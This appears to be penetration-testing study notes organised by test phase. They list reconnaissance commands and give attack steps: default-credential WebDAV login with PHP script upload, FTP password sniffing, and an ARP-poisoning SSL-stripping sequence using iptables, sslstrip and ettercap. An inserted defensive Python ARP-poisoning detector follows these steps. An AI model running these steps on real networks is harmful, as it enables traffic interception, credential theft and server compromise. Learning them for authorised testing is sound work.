1. Pre-engagement
###############################################################################
2. Information Gathering
**OSINT**
InSpy
--How to Use it?
1. inspy "Company Name" --empspy /usr/share/inspy/wordlists/title-list-large.txt
Recon-ng
Search for additional subdomains
1. use recon/hosts/gather/http/web/google_site
2. set DOMAIN cryptors.org
3. run
Search for XSS
1. use recon/hosts/enum/http/web/xssed
-NETCRAFT
--How to use it?
---1. Go to www.netcraft.com
---2. Enter the target website
--What does it do?
---1. Provides publicly available information about the target, such as:
----1. Hosting provider
----2. Domain provider
----3. Web server
----4. Uptime logs
----5. Information about the software they are using
-WHOIS LOOKUPS
--How to use it?
---1. Open terminal and type: whois targetWebsite.com
--What does it do?
---1. Provides information about the website owner, including contact info
---2. Provides the hosting and domain provider information
-DNS Reconnaissance
dnsenum cryptors.org
host -t ns cryptors.org
host -t mx cryptors.org
--NSLOOKUP
---How to use it #1?
----1. Open terminal and type: nslookup www.target.com
---What does it do?
----1. It will return the target's IP address and website name
---How to use it #2?
----1. nslookup
----2. set type=mx
----3. target.com
---What does it do?
----1. It will return the mail servers of the target
--HOST
---How to use it?
----1. host -t ns target.com
---What does it do?
----1. Gives us the name servers for the target
--ZONE TRANSFER
---How to use it?
----1. host -l domainToTransfer.com nameServer.com
---What does it do?
----1. It can transfer all DNS records for a domain, provided the name server permits zone transfers
--THEHARVESTER
---How to use it?
----1. theharvester -d target.com -b google
---What does it do?
----1. It will list all email addresses found for the target website and its subdomains
-MALTEGO
--How to use it?
---1. Search for the Maltego app in Kali Linux
---2. Select Domain as the target
---3. Run transforms based on your needs
--What does it do?
---1. Provides DNS information
---2. Provides a list of email addresses in the company
---3. Provides a list of phone numbers in the company
---4. Provides a list of files available from the company
---5. Gives an illustrative, graphical view of the company
**PORT SCANNING**
--NETCAT
---How to use it?
----1. nc -vv 192.168.0.10 21
---What does it do?
----1. -vv makes netcat very verbose, printing the details of each step
----2. 192.168.0.10 is the target IP address
----3. 21 is the target port number
###############################################################################
3. Threat Modeling
###############################################################################
4. Vulnerability Analysis
-NIKTO
--How to use it?
---1. nikto -h websiteOrIpAddressOfTarget
--What does it do?
---1. It scans the website for possible vulnerabilities
-CADAVER
--How to use it?
---1. Check whether the target website has WebDAV by entering http://website/webdav in the browser
---2. WebDAV allows clients to perform remote web content operations, such as creating, changing and moving documents on a server
---3. If the page shows "WebDav Test Page", you can use cadaver
---4. cadaver http://192.168.100.117/webdav
---5. It will now prompt for a username and password. The default username and password are wampp:xampp
--What does it do?
---1. It gives you access to the server, where you can do pretty much everything.
WIRESHARK
--How to use it?
---1. Click Capture and choose an interface (eth0, wlan0)
---2. Uncheck Promiscuous Mode, then Start
---3. Make an FTP connection to the target
---4. Filter the capture in Wireshark by entering "ftp" in the filter box
---5. We can also use ip.dst==192.168.100.117 to show only packets sent to this destination IP
---6. We can also combine these filters with &&:
ip.dst==192.168.100.117 && ftp
---7. We can see the username and password by digging deeper with Follow TCP Stream:
----1. Right-click the start of the transaction
----2. Click Follow
----3. Click TCP Stream
----4. It will show details such as the username and password
ARP
--How to use it?
---1. Just type: arp
--What does it do?
---1. It allows us to view the ARP cache on the local machine
IP Forwarding
--1. THIS IS NEEDED BEFORE CONDUCTING ARP CACHE POISONING
--2. echo 1 > /proc/sys/net/ipv4/ip_forward
SSL Stripping
--1. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
--2. sslstrip -l 8080
--3. ettercap -Ti wlan0 -M arp:remote /192.168.1.1// /192.168.1.9//
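A defender-side check for the ARP cache poisoning that the ARP, IP Forwarding and SSL Stripping steps above rely on, added here as an example and not part of the original notes: it compares two `arp -a` snapshots and flags the IP-to-MAC changes, and the single MAC claiming both the gateway and a host, that an ettercap `arp:remote` session leaves in the victims' caches. The snapshots are constructed sample data and the function names are my own.

```python
import re
from collections import defaultdict

# A Linux `arp -a` entry looks like:
#   gateway (192.168.1.1) at 00:11:22:33:44:55 [ether] on wlan0
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)\s+at\s+"
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.IGNORECASE)

def parse_arp(output):
    """Return {ip: mac} from `arp -a` text; incomplete entries are skipped."""
    table = {}
    for line in output.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table

def find_anomalies(before, after):
    """Compare two ARP cache snapshots and return suspicious changes:
    mac_changed   - an IP now resolves to a different MAC than in the baseline
    duplicate_mac - one MAC answers for several IPs, as when a host poses as
                    both the gateway and a victim"""
    findings = []
    for ip, mac in after.items():
        old = before.get(ip)
        if old and old != mac:
            findings.append(("mac_changed", ip, old, mac))
    owners = defaultdict(list)
    for ip, mac in after.items():
        owners[mac].append(ip)
    for mac, ips in owners.items():
        if len(ips) > 1:
            findings.append(("duplicate_mac", mac, tuple(sorted(ips))))
    return findings
# Constructed sample snapshots, not real captures.
BASELINE = """\
gateway (192.168.1.1) at 00:11:22:33:44:55 [ether] on wlan0
desktop (192.168.1.9) at aa:bb:cc:dd:ee:01 [ether] on wlan0
printer (192.168.1.20) at aa:bb:cc:dd:ee:20 [ether] on wlan0
"""
POISONED = """\
gateway (192.168.1.1) at DE:AD:BE:EF:00:01 [ether] on wlan0
desktop (192.168.1.9) at de:ad:be:ef:00:01 [ether] on wlan0
printer (192.168.1.20) at aa:bb:cc:dd:ee:20 [ether] on wlan0
"""
def check_sample():
    """Run the comparison on the constructed snapshots above."""
    return find_anomalies(parse_arp(BASELINE), parse_arp(POISONED))
```

On a real host, take the baseline from a known-good `arp -a` and re-run the comparison periodically; static ARP entries for the gateway or switch-level dynamic ARP inspection are the corresponding mitigations.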
###############################################################################
5. Exploitation
CADAVER
--1. cadaver http://192.168.1.4/webdav
--2. Username and password: wampp:xampp
--3. put test.txt (to upload a file)
--4. put test.php (to upload scripts)
Bypassing Filters
###############################################################################
6. Post Exploitation
###############################################################################
7. Reporting